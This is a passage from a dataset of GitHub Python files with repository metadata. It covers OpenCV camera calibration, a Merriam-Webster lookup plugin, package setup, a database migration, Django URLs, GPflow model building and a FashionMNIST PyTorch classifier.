filename in enumerate(images):\n\t#print(filename)\n\timg = cv2.imread(filename)\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\n\t# Find corners of the chessboard\n\tret, corners = cv2.findChessboardCorners(gray,(9,6), None)\n\t\n\tif ret == True:\n\t\tobjpoints.append(objp)\n\t\timgpoints.append(corners)\n\t\t\n\t\t# Draw the corners on the chessboard and save the images\n\t\tcv2.drawChessboardCorners(img,(9,6), corners, ret)\n\t\twname = './camera_cal/chesscorners'+str(idx)+'.jpg'\n\t\tcv2.imwrite(wname, img)\n\t\t\nimg = cv2.imread('./camera_cal/calibration1.jpg')\nsize = (img.shape[1],img.shape[0])\n\n# Generate required matrices\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nundist = cv2.undistort(img, mtx, dist, None, mtx)\n\nwname = './output_images/undistorted.jpg'\ncv2.imwrite(wname, undist)\n\t\n# Save the required matrices in a pickle file\npickle_data = {}\npickle_data[\"mtx\"] = mtx\npickle_data[\"dist\"] = dist\npickle.dump(pickle_data, open(\"./camera_cal/calibration_pickle.p\",\"wb\"))\n", "repo_name": "sunny1986/SDC_P4_Advanced_Lane_Search", "sub_path": "camera_calibration.py", "file_name": "camera_calibration.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 8, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 43, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "26045425861", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"This is a simple python template extension.\n\nThis extension should show the API in a comprehensible way. Use the module docstring to provide a \\\ndescription of the extension. 
The docstring should have three paragraphs: A brief description in \\\nthe first line, an optional elaborate description of the plugin, and finally the synopsis of the \\\nextension.\n\nSynopsis: [delay|throw] \"\"\"\nfrom albert import *\nimport os\nimport requests\nimport json\nimport re\nimport pickle\nimport dataparser\n\n__title__ = \"Merriam-Webster Dictionary lookup\"\n__version__ = \"0.0.2\"\n__triggers__ = \"mw \"\n__authors__ = \"mrlys\"\n__py_deps__ = [\"requests\", \"json\", \"re\", \"pickle\"]\n#__exec_deps__ =\n\niconPath = iconLookup(\"albert\")\ndb_file = '.webster_db'\nkey = os.environ['WEBSTER_KEY']\nsearch_url = 'https://www.dictionaryapi.com/api/v3/references/collegiate/json/%s?key='+key\n\n\n# Can be omitted\ndef initialize():\n    pass\n\n\n# Can be omitted\ndef finalize():\n    pass\n\ndef handleQuery(query):\n    if not query.isTriggered:\n        return\n\n    # Note that when storing a reference to query, e.g. in a closure, you must not use\n    # query.isValid. Apart from the query being invalid anyway, it will crash the application.\n    # The Python type holds a pointer to the C++ type used for isValid(). The C++ type will be\n    # deleted when the query is finished. Therefore getting isValid will result in a SEGFAULT.\n\n    if not len(query.string) > 2:\n        item = Item()\n        item.icon = iconPath\n        item.text = '%s' % query.string\n        item.subtext = 'At least 3 characters'\n        return [item]\n    db = {}\n    if os.path.exists(db_file):\n        debug(\"db file exists\")\n        infile = open(db_file, 'rb')\n        db = pickle.load(infile)\n        infile.close()\n    debug(\"db: \" + str(db))\n    info(query.string)\n    info(query.rawString)\n    info(query.trigger)\n    info(str(query.isTriggered))\n    info(str(query.isValid))\n\n    critical(query.string)\n    warning(query.string)\n    debug(query.string)\n    debug(query.string)\n\n    results = []\n    if query.string in db:\n        res = db[query.string]\n    else:\n        res = requests.get(search_url % query.string)\n        json_result = res.json()\n\n        info(json_result)\n        data = dataparser.parse_data(json_result)\n        db[query.string] = data\n    data = db[query.string]\n    if 'suggestions' in data:\n        data = data['suggestions']\n        for unit in data:\n            item = Item(id=__title__,\n                        icon=os.path.dirname(__file__) + \"/uib_ordbok.png\",\n                        text='%s' % unit,\n                        subtext='Suggestion',\n                        completion=__triggers__ + '%s' % unit,\n                        urgency=ItemBase.Notification,\n                        actions=[])\n            results.append(item)\n    elif 'defs' in data:\n        data = data['defs']\n        for unit in data:\n            item = Item(id=__title__,\n                        icon=os.path.dirname(__file__) + \"/uib_ordbok.png\",\n                        text='%s' % query.string,\n                        subtext=unit,\n                        completion=__triggers__ + '%s' % unit,\n                        urgency=ItemBase.Notification,\n                        actions=[])\n            results.append(item)\n\n    # Api v 0.2\n    info(configLocation())\n    info(cacheLocation())\n    info(dataLocation())\n    outfile = open(db_file, 'wb')\n    pickle.dump(db, outfile)\n    outfile.close()\n    return results\n", "repo_name": "MrLys/albert_merriam_webster", "sub_path": "__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 78, "usage_type": "call"}, {"api_name": "dataparser.parse_data", "line_number": 82, 
"usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "907599222", "text": "from __future__ import print_function\n\nimport os\nimport sys\n\nv = sys.version_info\nif v[:2] < (3,3):\n error = \"ERROR: Jupyter Hub requires Python version 3.3 or above.\"\n print(error, file=sys.stderr)\n sys.exit(1)\n\n\nif os.name in ('nt', 'dos'):\n error = \"ERROR: Windows is not supported\"\n print(error, file=sys.stderr)\n\n\nfrom setuptools import setup\n\npjoin = os.path.join\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Get the current package version.\nversion_ns = {}\n\nfrom setuptools.command.bdist_egg import bdist_egg\nclass bdist_egg_disabled(bdist_egg):\n \"\"\"Disabled version of bdist_egg\n Prevents setup.py install from performing setuptools' default easy_install,\n which it should never ever do.\n \"\"\"\n def run(self):\n sys.exit(\"Aborting implicit building of eggs. Use `pip install .` to install from source.\")\n\nsetup_args = dict(\n name = 'remotesingularityspawner',\n packages = ['remotesingularityspawner'],\n version = \"0.0.4\",\n description = \"\"\"RemoteSingularitySpawner: A custom spawner for Jupyterhub in singularity container.\"\"\",\n long_description = \"\",\n author = \"xinping fan\",\n author_email = \"897488736@qq.com\",\n url = \"https://github.com/fanxinping/remotesingularityspawner\",\n download_url = \"https://github.com/fanxinping/remotesingularityspawner/archive/v0.0.4.tar.gz\",\n license = \"BSD\",\n platforms = \"Linux, Mac OS X\",\n keywords = ['Interactive', 'Interpreter', 'Shell', 'Web'],\n classifiers = [\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires = [\n 'paramiko'],\n entry_points={\n 'jupyterhub.spawners': [\n 'remote-singularity-spawner = remotesingularityspawner:RemoteSingularitySpawner'\n ],\n },\n cmdclass = {\n 'bdist_egg': bdist_egg if 'bdist_egg' in sys.argv else bdist_egg_disabled,\n }\n)\n\n\ndef main():\n setup(**setup_args)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "fanxinping/remotesingularityspawner", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2310, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 10, "usage_type": "call"}, {"api_name": "os.name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "setuptools.command.bdist_egg.bdist_egg", "line_number": 27, "usage_type": "name"}, {"api_name": 
"sys.exit", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "setuptools.command.bdist_egg.bdist_egg", "line_number": 64, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "70470620006", "text": "\"\"\"Restore price column\n\nRevision ID: 4d1e3cd2d723\nRevises: 078505ddf451\nCreate Date: 2020-03-29 20:02:35.023163\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '4d1e3cd2d723'\ndown_revision = '078505ddf451'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('books', sa.Column('price', postgresql.MONEY(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('books', 'price')\n # ### end Alembic commands ###\n", "repo_name": "a5hik/db", "sub_path": "alembic/versions/4d1e3cd2d723_restore_price_column.py", "file_name": "4d1e3cd2d723_restore_price_column.py", "file_ext": "py", "file_size_in_byte": 703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.MONEY", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "38972185975", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 19 16:11:29 2019\n\n@author: Carter\n\"\"\"\nfrom computeH import computeH\nfrom warpImage import warpImage\nimport numpy as np\nimport cv2\n\ndef scale_down(lis,image):\n for i in range(len(lis)):\n lis[i,0] = lis[i,0]/image.shape[0]*2\n lis[i,1] = lis[i,1]/image.shape[1]*2\n return lis\n\ndef scale_down_2(t1,t2):\n max_val = max(np.max(t1),np.max(t2))\n t1 = t1/max_val\n t2 = t2/max_val\n return t1,t2\n\ndef reverse(cc1):\n cc1_rev = np.empty(cc1.shape)\n for i in range(len(cc1)):\n cc1_rev[i,0] = cc1[i,1] \n cc1_rev[i,1] = cc1[i,0]\n return cc1_rev\n \nt1 = np.load('points1.npy')\nt2 = np.load('points2.npy')\n\nimg1 = cv2.imread('wdc1.jpg')\nimg2 = cv2.imread('wdc2.jpg')\n\nt1,t2 = scale_down_2(t1,t2)\nt1 = scale_down(t1.T,img1)\nt2 = scale_down(t2.T,img2)\n\nt1 = reverse(t1.T)\nt2 = reverse(t2.T)\nt1 = t1.T\nt2 = t2.T\n\nh = computeH(t1,t2)\n\nfinal, merged = warpImage(img1,img2,h)\n\ncv2.imshow(\"final\", final)\ncv2.waitKey()\ncv2.imshow(\"merged\", merged)\ncv2.waitKey()\ncv2.destroyAllWindows()\n", "repo_name": "carterprice2/Computer_Vision", "sub_path": "PS3/Price_Leon_Carter_PS3_py/final_test.py", "file_name": "final_test.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.max", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 31, "usage_type": "call"}, {"api_name": 
"numpy.load", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "computeH.computeH", "line_number": 46, "usage_type": "call"}, {"api_name": "warpImage.warpImage", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "30555719356", "text": "\"\"\"Appliances urls\"\"\"\nfrom django.urls import path, include\nfrom appliances import views\n\n\nurlpatterns = [\n path('', views.AppliancesHomeView.as_view(), name=\"appliances_home\"),\n path('add_task', views.AddTaskFormView.as_view(), name=\"add_task\"),\n path('add_task_input/', views.add_task_input, name=\"add_task_input\"),\n path('check_task', views.check_task, name=\"check_task\"),\n path('edit_task_description', views.edit_task_description, name=\"edit_task_description\"),\n path('delete_task/', views.delete_task, name=\"delete_task\"),\n path('edit_appliance', views.EditApplianceFormView.as_view(), name=\"edit_appliance\"),\n path('edit_appliance_status', views.EditApplianceStatusFormView.as_view(), name=\"edit_appliance_status\"),\n path('notation_chart/', views.get_notations_chart, name='chart_notations'),\n # path('add_company', views.ContactsAddCompanyFormView.as_view(), name=\"add_company\"),\n # path('delete_company', views.ContactsDeleteCompanyFormView.as_view(), name=\"delete_company\"),\n # path('add_contact', views.ContactsAddContactFormView.as_view(), name=\"add_contact\"),\n # path('edit_contact', views.ContactsEditContactFormView.as_view(), name=\"edit_contact\"),\n # path('delete_contact', views.ContactsDeleteContactFormView.as_view(), name=\"delete_contact\"),\n # path('add_mission', views.ContactsAddMissionFormView.as_view(), name=\"add_mission\"),\n # path('delete_mission', views.ContactsDeleteMissionFormView.as_view(), name=\"delete_mission\"),\n]\n", "repo_name": "MickaPch/OC_Projet13_Fireworks", "sub_path": "appliances/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1545, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "appliances.views.AppliancesHomeView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "appliances.views.AppliancesHomeView", "line_number": 7, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "appliances.views.AddTaskFormView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "appliances.views.AddTaskFormView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "appliances.views.add_task_input", "line_number": 9, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": 
"appliances.views.check_task", "line_number": 10, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "appliances.views.edit_task_description", "line_number": 11, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "appliances.views.delete_task", "line_number": 12, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceFormView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceFormView", "line_number": 13, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceStatusFormView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceStatusFormView", "line_number": 14, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "appliances.views.get_notations_chart", "line_number": 15, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "28127631209", "text": "import numpy as np\nimport gpflow\nimport tensorflow as tf\n\nfrom core.svgp.svgp import SVGP\nfrom core.svgp.blk_svgp import BlockSVGP\nfrom core.svgp.multi_gpu import MultiGPU\nfrom core.svgp.reflection import ReflectionFeatures, ReflectionSingleFeatures\nfrom core.utils.utils import InducingPoints\nfrom utils.utils import get_kemans_init, median_distance_global\n\n\ndef get_model(args, train_x, train_y):\n kern = get_kern(args, train_x)\n lik = gpflow.likelihoods.Gaussian(name='lik')\n lik.variance = 0.1\n num_data = train_x.shape[0]\n tf_train_x, tf_train_y = data_iterator(train_x, train_y, min(args.batch_size, num_data))\n Z = get_kemans_init(train_x, args.num_inducing)\n\n if args.model == 'svgp':\n feat = InducingPoints(Z, name='features')\n model = SVGP(tf_train_x, tf_train_y, kern, lik, feat=feat, XY_tensor=True, num_data=num_data, name='model')\n elif args.model == 'ref':\n feat = ReflectionFeatures([Z] * args.J, U=np.eye(Z.shape[-1]), name='feature')\n model = BlockSVGP(tf_train_x, tf_train_y, kern, lik, feat, XY_tensor=True, num_data=num_data, name='model')\n elif args.model == 'refmg':\n assert args.num_gpu > 1\n Sigma = np.cov(train_x, rowvar=False)\n _, U = np.linalg.eigh(Sigma)\n def feat_fn(z, i, name):\n return ReflectionSingleFeatures(z, U, i, args.J, name)\n model = MultiGPU(tf_train_x, tf_train_y, kern, lik, feat_fn, [Z]*args.J, args.num_gpu,\n XY_tensor=True, num_data=num_data, name='model')\n else:\n raise NotImplementedError\n\n if isinstance(model, MultiGPU):\n loss, grads_and_vars = model.build_objective_and_grads()\n obs_var = lik.variance.constrained_tensor\n print_dict = {'loss': loss, 'obs_var': obs_var}\n\n global_step = tf.Variable(0, trainable=False)\n optimizer = tf.train.AdamOptimizer(args.learning_rate)\n train_op = optimizer.apply_gradients(grads_and_vars)\n return model, print_dict, train_op, global_step\n else:\n loss = 
model.objective / num_data\n obs_var = lik.variance.constrained_tensor\n print_dict = {'loss': loss, 'obs_var': obs_var}\n\n global_step = tf.Variable(0, trainable=False)\n optimizer = tf.train.AdamOptimizer(args.learning_rate)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return model, print_dict, train_op, global_step\n\n\ndef get_kern(args, train_x):\n ls = median_distance_global(train_x)\n if args.kern == 'rbf':\n kern = gpflow.kernels.RBF(train_x.shape[1], lengthscales=ls, name='rbf')\n elif args.kern == 'matern32':\n kern = gpflow.kernels.Matern32(train_x.shape[1], lengthscales=ls, name='matern32')\n else:\n raise NotImplementedError\n return kern\n\n\ndef data_iterator(numpy_train_x, numpy_train_y, batch_size):\n iterator = tf.data.Dataset.from_tensor_slices(\n (numpy_train_x.astype(gpflow.settings.float_type),\n numpy_train_y.astype(gpflow.settings.float_type))).shuffle(buffer_size=10000)\n iterator = iterator.batch(batch_size, drop_remainder=True).repeat()\n train_x, train_y = iterator.make_one_shot_iterator().get_next()\n return train_x, train_y\n", "repo_name": "ssydasheng/Harmonic-Kernel-Decomposition", "sub_path": "utils/model_utils.py", "file_name": "model_utils.py", "file_ext": "py", "file_size_in_byte": 3210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gpflow.likelihoods.Gaussian", "line_number": 15, "usage_type": "call"}, {"api_name": "gpflow.likelihoods", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.utils.get_kemans_init", "line_number": 19, "usage_type": "call"}, {"api_name": "core.utils.utils.InducingPoints", "line_number": 22, "usage_type": "call"}, {"api_name": "core.svgp.svgp.SVGP", "line_number": 23, "usage_type": "call"}, {"api_name": "core.svgp.reflection.ReflectionFeatures", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 25, "usage_type": "call"}, {"api_name": "core.svgp.blk_svgp.BlockSVGP", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg.eigh", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 30, "usage_type": "attribute"}, {"api_name": "core.svgp.reflection.ReflectionSingleFeatures", "line_number": 32, "usage_type": "call"}, {"api_name": "core.svgp.multi_gpu.MultiGPU", "line_number": 33, "usage_type": "call"}, {"api_name": "core.svgp.multi_gpu.MultiGPU", "line_number": 38, "usage_type": "argument"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 53, "usage_type": "attribute"}, {"api_name": "utils.utils.median_distance_global", "line_number": 59, "usage_type": "call"}, {"api_name": "gpflow.kernels.RBF", "line_number": 61, "usage_type": "call"}, {"api_name": "gpflow.kernels", "line_number": 61, "usage_type": "attribute"}, {"api_name": "gpflow.kernels.Matern32", "line_number": 63, "usage_type": "call"}, {"api_name": "gpflow.kernels", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 70, "usage_type": 
"call"}, {"api_name": "tensorflow.data", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gpflow.settings", "line_number": 71, "usage_type": "attribute"}, {"api_name": "gpflow.settings", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "35587447833", "text": "import torch\nfrom torch import nn \nfrom torchvision import datasets, transforms\n\n\n# prepocesing image\n\ntransform=transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n\nbatch_size=64 \ntrainset = datasets.FashionMNIST('Fashion_MNIST/', download=True, train=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n\n# Download and load the test data\ntestset = datasets.FashionMNIST('Fashion_MNIST/', download=True, train=False, transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=True)\nprint(\"hello\")\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1=nn.Linear(784,256)\n self.hidden2=nn.Linear(256,128)\n self.output=nn.Linear(128,10)\n self.softmax=nn.Softmax(dim=1)\n self.activation=nn.ReLU()\n def forward(self,x):\n x = self.hidden1(x)\n x=self.activation(x)\n x=self.hidden2(x)\n x=self.activation(x)\n x=self.output(x)\n output=self.softmax(x)\n return(output)\n\n\n\nmodel=FashionNetwork()\nprint(model)\ncriterion=nn.NLLLoss()\n\n\nfrom torch import optim\noptimizer=optim.Adam(model.parameters())\noptimizer.defaults\n\noptimizer=optim.Adam(model.parameters(),lr=3e-3)\noptimizer.defaults\nepoch=10\n\nfor _ in range(epoch):\n running_loss=0\n for image, label in trainloader:\n optimizer.zero_grad()\n image=image.view(image.shape[0],-1)\n pred=model(image)\n loss=criterion(pred,label)\n loss.backward()\n optimizer.step()\n running_loss +=loss.item()\n else:\n print(f'Training loss: {running_loss/len(trainloader):.4f}')\n\ntorch.tensor([[1]]).item()\n\n\n\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1 = nn.Linear(784, 256)\n self.hidden2 = nn.Linear(256, 128)\n self.output = nn.Linear(128, 10)\n self.log_softmax = nn.LogSoftmax()\n self.activation = nn.ReLU()\n self.drop = nn.Dropout(p=0.25)\n def forward(self, x):\n x = self.hidden1(x)\n x = self.activation(x)\n x = self.drop(x)\n x = self.hidden2(x)\n x = self.activation(x)\n x = self.drop(x)\n x = self.output(x)\n output = self.log_softmax(x)\n return output\n\n\n\nmodel = FashionNetwork()\nmodel\n\nimport torch.nn.functional as F\n\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1 = nn.Linear(784,256)\n self.hidden2 = nn.Linear(256,128)\n self.output = nn.Linear(128,10)\n \n \n def forward(self,x):\n x = F.relu(self.hidden1(x))\n x = F.relu(self.hidden2(x))\n x = F.log_softmax(self.output(x))\n return x\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "GroverAruquipa/Msc_script_MS", "sub_path": "NN-pytorch.py", "file_name": "NN-pytorch.py", "file_ext": "py", "file_size_in_byte": 2867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms", 
"line_number": 9, "usage_type": "name"}, {"api_name": "torchvision.datasets.FashionMNIST", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.FashionMNIST", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": 